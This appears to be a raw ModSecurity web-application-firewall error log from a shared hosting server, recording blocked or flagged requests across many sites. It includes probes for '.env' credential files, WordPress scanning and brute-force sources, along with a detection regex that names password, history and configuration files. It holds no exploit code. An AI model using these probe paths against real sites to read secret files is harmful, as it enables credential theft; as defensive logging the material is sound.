[Tue May 26 16:23:24.375882 2026] [security2:error] [pid 795941:tid 796155] [client 216.73.217.138:26457] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahV7o-2GQ_TLE_VHIp2RGQAA2VY"]
[Tue May 26 16:23:24.562112 2026] [security2:error] [pid 795941:tid 796175] [client 2.58.56.163:51236] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahV7pO2GQ_TLE_VHIp2RKwAAAO0"]
[Tue May 26 16:23:25.309407 2026] [security2:error] [pid 795941:tid 796167] [client 2.58.56.163:62038] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahV7pe2GQ_TLE_VHIp2RNQAAAOU"]
[Tue May 26 16:23:26.077817 2026] [security2:error] [pid 795941:tid 796106] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7pe2GQ_TLE_VHIp2RMQAAAKg"]
[Tue May 26 16:23:26.148302 2026] [security2:error] [pid 795941:tid 796103] [client 2.58.56.163:63343] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahV7pu2GQ_TLE_VHIp2RSAAAAKU"]
[Tue May 26 16:23:26.348434 2026] [security2:error] [pid 795941:tid 796146] [client 216.73.217.138:26457] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahV7pe2GQ_TLE_VHIp2RPAAA0Fw"]
[Tue May 26 16:23:26.953390 2026] [security2:error] [pid 795941:tid 796079] [client 2.58.56.163:61528] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahV7pu2GQ_TLE_VHIp2RVQAAAI0"]
[Tue May 26 16:23:27.455338 2026] [security2:error] [pid 795941:tid 796075] [client 184.154.139.45:59874] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/wp-content/plugins/wpforms-lite/assets/js/frontend/wpforms-modern.min.js"] [unique_id "ahV7p-2GQ_TLE_VHIp2RWwAAAIk"]
[Tue May 26 16:23:27.656025 2026] [security2:error] [pid 795941:tid 796113] [client 2.58.56.163:64681] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahV7p-2GQ_TLE_VHIp2RYAAAAK8"]
[Tue May 26 16:23:27.696005 2026] [security2:error] [pid 795941:tid 796111] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7pu2GQ_TLE_VHIp2RTwAAAK0"]
[Tue May 26 16:23:27.899423 2026] [security2:error] [pid 795941:tid 796095] [client 184.154.139.45:59986] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahV7p-2GQ_TLE_VHIp2RYgAAAJ0"]
[Tue May 26 16:23:28.028338 2026] [security2:error] [pid 795941:tid 796091] [client 185.191.171.18:39440] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/january-20th/day/2024-06-01/"] [unique_id "ahV7qO2GQ_TLE_VHIp2RaAAAAJk"]
[Tue May 26 16:23:28.028468 2026] [security2:error] [pid 795941:tid 796091] [client 185.191.171.18:39440] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/january-20th/day/2024-06-01/"] [unique_id "ahV7qO2GQ_TLE_VHIp2RaAAAAJk"]
[Tue May 26 16:23:28.305634 2026] [security2:error] [pid 795941:tid 796137] [client 2.58.56.163:53434] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahV7qO2GQ_TLE_VHIp2RbwAAAMc"]
[Tue May 26 16:23:28.991286 2026] [security2:error] [pid 795941:tid 796166] [client 2.58.56.163:58984] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahV7qO2GQ_TLE_VHIp2RhwAAAOQ"]
[Tue May 26 16:23:29.543334 2026] [security2:error] [pid 795941:tid 796163] [client 72.14.147.185:37962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "kingsclubmembership.com"] [uri "/.env"] [unique_id "ahV7qe2GQ_TLE_VHIp2RkwAAAOE"]
[Tue May 26 16:23:29.692868 2026] [security2:error] [pid 795941:tid 796105] [client 2.58.56.163:57828] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahV7qe2GQ_TLE_VHIp2RmQAAAKc"]
[Tue May 26 16:23:29.991207 2026] [security2:error] [pid 795941:tid 796159] [client 72.14.147.185:37970] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclubmembership.com"] [uri "/index.php"] [unique_id "ahV7qe2GQ_TLE_VHIp2RkgAAAN0"]
[Tue May 26 16:23:30.301796 2026] [security2:error] [pid 795941:tid 796132] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7qe2GQ_TLE_VHIp2RjQAAAMI"]
[Tue May 26 16:23:30.932129 2026] [security2:error] [pid 795941:tid 796090] [client 184.154.139.45:60672] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahV7qu2GQ_TLE_VHIp2RrwAAAJg"]
[Tue May 26 16:23:31.359876 2026] [security2:error] [pid 795941:tid 796129] [client 72.14.147.185:37962] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclubmembership.com"] [uri "/index.php"] [unique_id "ahV7qu2GQ_TLE_VHIp2RswAAAL8"]
[Tue May 26 16:23:31.833259 2026] [security2:error] [pid 795941:tid 796103] [client 72.14.147.185:37970] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclubmembership.com"] [uri "/index.php"] [unique_id "ahV7q-2GQ_TLE_VHIp2RuQAAAKU"]
[Tue May 26 16:23:32.713896 2026] [security2:error] [pid 795941:tid 796142] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7q-2GQ_TLE_VHIp2RvAAAAMw"]
[Tue May 26 16:23:33.147243 2026] [security2:error] [pid 795941:tid 796128] [client 72.14.147.185:37962] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclubmembership.com"] [uri "/index.php"] [unique_id "ahV7rO2GQ_TLE_VHIp2R0gAAAL4"]
[Tue May 26 16:23:33.328856 2026] [security2:error] [pid 795941:tid 796089] [client 72.14.147.185:38476] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "kingsclubmembership.com"] [uri "/backend/.env"] [unique_id "ahV7re2GQ_TLE_VHIp2R6QAAAJc"]
[Tue May 26 16:23:33.328880 2026] [security2:error] [pid 795941:tid 796172] [client 72.14.147.185:38486] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "kingsclubmembership.com"] [uri "/api/.env"] [unique_id "ahV7re2GQ_TLE_VHIp2R6gAAAOo"]
[Tue May 26 16:23:33.435306 2026] [security2:error] [pid 795941:tid 796187] [client 72.14.147.185:37970] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclubmembership.com"] [uri "/index.php"] [unique_id "ahV7rO2GQ_TLE_VHIp2R2AAAAPk"]
[Tue May 26 16:23:33.606986 2026] [security2:error] [pid 795941:tid 796193] [client 72.14.147.185:38462] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclubmembership.com"] [uri "/index.php"] [unique_id "ahV7re2GQ_TLE_VHIp2R4AAAAP8"]
[Tue May 26 16:23:33.793405 2026] [security2:error] [pid 795941:tid 796108] [client 72.14.147.185:38558] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclubmembership.com"] [uri "/index.php"] [unique_id "ahV7re2GQ_TLE_VHIp2R7wAAAKo"]
[Tue May 26 16:23:33.799240 2026] [security2:error] [pid 795941:tid 796163] [client 72.14.147.185:38522] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclubmembership.com"] [uri "/index.php"] [unique_id "ahV7re2GQ_TLE_VHIp2R6wAAAOE"]
[Tue May 26 16:23:33.811070 2026] [security2:error] [pid 795941:tid 796084] [client 72.14.147.185:38512] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclubmembership.com"] [uri "/index.php"] [unique_id "ahV7re2GQ_TLE_VHIp2R8AAAAJI"]
[Tue May 26 16:23:34.174966 2026] [security2:error] [pid 795941:tid 796140] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7re2GQ_TLE_VHIp2R5wAAAMo"]
[Tue May 26 16:23:35.575581 2026] [security2:error] [pid 795941:tid 796104] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7ru2GQ_TLE_VHIp2SCgAAAKY"]
[Tue May 26 16:23:37.486294 2026] [security2:error] [pid 795941:tid 796159] [client 184.154.139.45:34774] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahV7se2GQ_TLE_VHIp2SSwAAAN0"], referer: http://www.google.com/url?url=ivwellnessresources.org&yahoo.com
[Tue May 26 16:23:37.794166 2026] [security2:error] [pid 795941:tid 796099] [client 184.154.139.45:34880] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/wp-content/et-cache/261027/et-divi-dynamic-261027.css"] [unique_id "ahV7se2GQ_TLE_VHIp2SUgAAAKE"]
[Tue May 26 16:23:37.997173 2026] [security2:error] [pid 795941:tid 796095] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7se2GQ_TLE_VHIp2SRAAAAJ0"]
[Tue May 26 16:23:39.593166 2026] [security2:error] [pid 795941:tid 796188] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7s-2GQ_TLE_VHIp2SswAAAPo"]
[Tue May 26 16:23:40.725349 2026] [security2:error] [pid 795941:tid 795967] [remote 209.42.18.223:50612] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.18.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahV7tO2GQ_TLE_VHIp2S0gAA7Rk"]
[Tue May 26 16:23:41.381871 2026] [security2:error] [pid 795941:tid 796125] [client 184.154.139.45:35846] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahV7te2GQ_TLE_VHIp2TDgAAALs"], referer: http://www.google.com/url?url=ivwellnessresources.org&yahoo.com
[Tue May 26 16:23:41.869682 2026] [security2:error] [pid 795941:tid 796154] [client 14.168.63.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7te2GQ_TLE_VHIp2TDQAAANg"]
[Tue May 26 16:23:42.567693 2026] [security2:error] [pid 795941:tid 796134] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7te2GQ_TLE_VHIp2TGQAAAMQ"]
[Tue May 26 16:23:43.730318 2026] [security2:error] [pid 795941:tid 796179] [client 184.154.139.45:36446] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahV7t-2GQ_TLE_VHIp2TQgAAAPE"], referer: http://www.google.com/url?url=ivwellnessresources.org&yahoo.com
[Tue May 26 16:23:44.035740 2026] [security2:error] [pid 795941:tid 796148] [client 184.154.139.45:36526] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/wp-content/et-cache/261091/et-core-unified-deferred-261091.min.css"] [unique_id "ahV7uO2GQ_TLE_VHIp2TRgAAANI"]
[Tue May 26 16:23:44.463945 2026] [security2:error] [pid 795941:tid 796181] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7t-2GQ_TLE_VHIp2TRQAAAPM"]
[Tue May 26 16:23:45.617933 2026] [security2:error] [pid 795941:tid 796185] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7uO2GQ_TLE_VHIp2TWgAAAPc"]
[Tue May 26 16:23:45.871779 2026] [security2:error] [pid 795941:tid 796143] [client 34.60.131.171:12416] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahV7ue2GQ_TLE_VHIp2TZAAAzXE"]
[Tue May 26 16:23:46.903841 2026] [security2:error] [pid 795941:tid 796072] [client 184.154.139.45:37216] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahV7uu2GQ_TLE_VHIp2TjgAAAIY"], referer: http://www.google.com/url?url=ivwellnessresources.org&yahoo.com
[Tue May 26 16:23:46.918616 2026] [security2:error] [pid 795941:tid 796126] [client 114.119.133.194:32865] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahV7uu2GQ_TLE_VHIp2TkQAAALw"], referer: http://haddingtonwines.com/cart?remove_item=62021a18331216014fee6916d6ee9584
[Tue May 26 16:23:46.968228 2026] [core:crit] [pid 795941:tid 796135] (13)Permission denied: [client 52.167.144.220:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:23:47.141889 2026] [security2:error] [pid 795941:tid 796162] [client 216.73.217.138:44333] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahV7uu2GQ_TLE_VHIp2ThgAA4AE"]
[Tue May 26 16:23:47.189558 2026] [security2:error] [pid 795941:tid 796162] [client 216.73.217.138:44333] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahV7uu2GQ_TLE_VHIp2ThwAA4Gc"]
[Tue May 26 16:23:47.211699 2026] [security2:error] [pid 795941:tid 796071] [client 184.154.139.45:37346] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/wp-content/et-cache/261088/et-divi-dynamic-261088-late.css"] [unique_id "ahV7u-2GQ_TLE_VHIp2TmwAAAIU"]
[Tue May 26 16:23:47.707048 2026] [security2:error] [pid 795941:tid 796098] [client 184.154.139.45:37432] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahV7u-2GQ_TLE_VHIp2TpAAAAKA"]
[Tue May 26 16:23:48.118902 2026] [security2:error] [pid 795941:tid 796167] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7u-2GQ_TLE_VHIp2ToAAAAOU"]
[Tue May 26 16:23:49.483689 2026] [security2:error] [pid 795941:tid 796194] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7vO2GQ_TLE_VHIp2TvgAAAQA"]
[Tue May 26 16:23:49.607928 2026] [security2:error] [pid 795941:tid 796141] [client 216.73.217.138:44333] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahV7vO2GQ_TLE_VHIp2TvwAAy0M"]
[Tue May 26 16:23:52.024498 2026] [security2:error] [pid 795941:tid 796120] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7v-2GQ_TLE_VHIp2T-QAAALY"]
[Tue May 26 16:23:53.559656 2026] [security2:error] [pid 795941:tid 796074] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7wO2GQ_TLE_VHIp2UHgAAAIg"]
[Tue May 26 16:23:54.187574 2026] [security2:error] [pid 795941:tid 796095] [client 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV7wu2GQ_TLE_VHIp2UMAAAnRw"]
[Tue May 26 16:23:55.745854 2026] [security2:error] [pid 795941:tid 796131] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7w-2GQ_TLE_VHIp2UQwAAAME"]
[Tue May 26 16:23:56.899967 2026] [security2:error] [pid 795941:tid 796012] [remote 74.7.241.58:51358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahV7xO2GQ_TLE_VHIp2UdgAA80Y"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 16:23:57.696549 2026] [security2:error] [pid 795941:tid 796096] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7xe2GQ_TLE_VHIp2UfwAAAJ4"]
[Tue May 26 16:23:58.546729 2026] [security2:error] [pid 795941:tid 796074] [client 184.154.139.45:40742] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahV7xu2GQ_TLE_VHIp2VEgAAAIg"], referer: http://www.google.com/url?url=ivwellnessresources.org&yahoo.com
